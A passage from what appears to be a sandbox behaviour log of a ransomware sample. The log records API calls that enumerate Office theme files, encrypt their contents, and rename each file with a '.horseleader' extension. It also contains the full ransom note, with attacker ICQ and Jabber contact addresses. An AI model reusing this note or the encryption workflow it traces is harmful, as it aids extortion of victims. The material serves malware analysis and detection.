lpOverlapped=0x0) returned 1 [0247.149] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x5ce8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.149] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.149] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.149] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.149] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xb9d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.149] ReadFile 
(in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.150] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.150] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.150] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.150] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.151] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.151] CloseHandle (hObject=0x1a4) returned 1 [0247.151] GetProcessHeap () returned 0x780000 [0247.151] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.151] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM.horseleader") returned 83 [0247.151] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft 
shared\\themes14\\ice\\ice.elm.horseleader")) returned 1 [0247.152] GetProcessHeap () returned 0x780000 [0247.152] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.153] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1ad, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ICE.INF", cAlternateFileName="")) returned 1 [0247.153] lstrcmpiW (lpString1="ICE.INF", lpString2="Windows") returned -1 [0247.153] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF") returned 71 [0247.153] StrStrIW (lpFirst="ICE.INF", lpSrch=".horseleader") returned 0x0 [0247.153] lstrcmpW (lpString1="ICE.INF", lpString2="#Decrypt#.txt") returned 1 [0247.153] lstrcmpW (lpString1="ICE.INF", lpString2="_uninstalling_.png") returned 1 [0247.153] lstrlenW (lpString=".testttjffg") returned 11 [0247.153] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF", lpSrch=".testttjffg") returned 0x0 [0247.153] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.153] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.153] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.inf"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.154] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF") returned 71 [0247.154] StrStrW (lpFirst="ICE.INF", lpSrch=".txt") returned 0x0 [0247.154] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=429) returned 1 [0247.154] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1ad, lpOverlapped=0x0) returned 1 [0247.155] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.156] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1ad, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1ad, lpOverlapped=0x0) returned 1 [0247.156] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.156] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.164] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.164] CloseHandle (hObject=0x1a4) returned 1 [0247.164] GetProcessHeap () returned 0x780000 [0247.164] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.164] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF.horseleader") returned 83 [0247.164] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.inf.horseleader")) returned 1 [0247.165] GetProcessHeap () returned 0x780000 [0247.165] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.165] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x9f8, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.166] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.166] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 75 [0247.166] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.166] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.166] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.166] lstrlenW (lpString=".testttjffg") returned 11 [0247.166] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.166] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 
pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.166] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.166] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.167] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 75 [0247.167] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.167] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2552) returned 1 [0247.167] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x9f8, lpOverlapped=0x0) returned 1 [0247.171] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff608, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.171] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x9f8, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x9f8, lpOverlapped=0x0) returned 1 [0247.171] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.171] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.171] WriteFile (in: 
hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.171] CloseHandle (hObject=0x1a4) returned 1 [0247.171] GetProcessHeap () returned 0x780000 [0247.172] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.172] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.horseleader") returned 87 [0247.172] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif.horseleader")) returned 1 [0247.175] GetProcessHeap () returned 0x780000 [0247.176] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.176] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4981, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.176] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.176] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") 
returned 76 [0247.176] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.176] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.176] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.176] lstrlenW (lpString=".testttjffg") returned 11 [0247.176] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.176] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.176] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.176] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.177] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 76 [0247.177] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.177] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=18817) returned 1 [0247.177] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4981, lpOverlapped=0x0) returned 1 [0247.179] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb67f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.179] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4981, 
lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4981, lpOverlapped=0x0) returned 1 [0247.179] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.179] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.179] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.179] CloseHandle (hObject=0x1a4) returned 1 [0247.179] GetProcessHeap () returned 0x780000 [0247.179] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.179] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.horseleader") returned 88 [0247.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png.horseleader")) returned 1 [0247.180] GetProcessHeap () returned 0x780000 [0247.180] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.180] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, 
ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4981, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.180] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.180] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\#Decrypt#.txt") returned 77 [0247.181] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.181] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.181] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.182] lstrlenA (lpString="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") returned 1368 [0247.182] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.182] CloseHandle (hObject=0x158) returned 1 [0247.182] GetProcessHeap () returned 0x780000 [0247.182] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.183] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x539538d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="INDUST", cAlternateFileName="")) returned 1 [0247.183] lstrcmpiW (lpString1="INDUST", lpString2="Windows") returned -1 [0247.183] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST") returned 66 [0247.183] lstrcmpW (lpString1="INDUST", lpString2=".") returned 1 [0247.183] lstrcmpW (lpString1="INDUST", lpString2="..") returned 1 [0247.183] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.183] GetProcessHeap () returned 0x780000 [0247.183] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0247.183] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\*") returned 68 [0247.183] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x539538d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.185] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.186] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\.") returned 68 [0247.186] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.186] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x539538d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.186] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.186] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\..") returned 69 [0247.186] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0247.186] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.186] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4901300, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x539538d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4901300, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x184e9, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="INDUST.ELM", cAlternateFileName="")) returned 1 [0247.186] lstrcmpiW (lpString1="INDUST.ELM", lpString2="Windows") returned -1 [0247.186] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM") returned 77 [0247.186] StrStrIW (lpFirst="INDUST.ELM", lpSrch=".horseleader") returned 0x0 [0247.186] lstrcmpW (lpString1="INDUST.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.186] lstrcmpW (lpString1="INDUST.ELM", lpString2="_uninstalling_.png") returned 1 [0247.186] lstrlenW (lpString=".testttjffg") returned 11 [0247.186] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM", lpSrch=".testttjffg") returned 0x0 [0247.186] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.186] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.186] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\indust.elm"), dwDesiredAccess=0xc0000000, 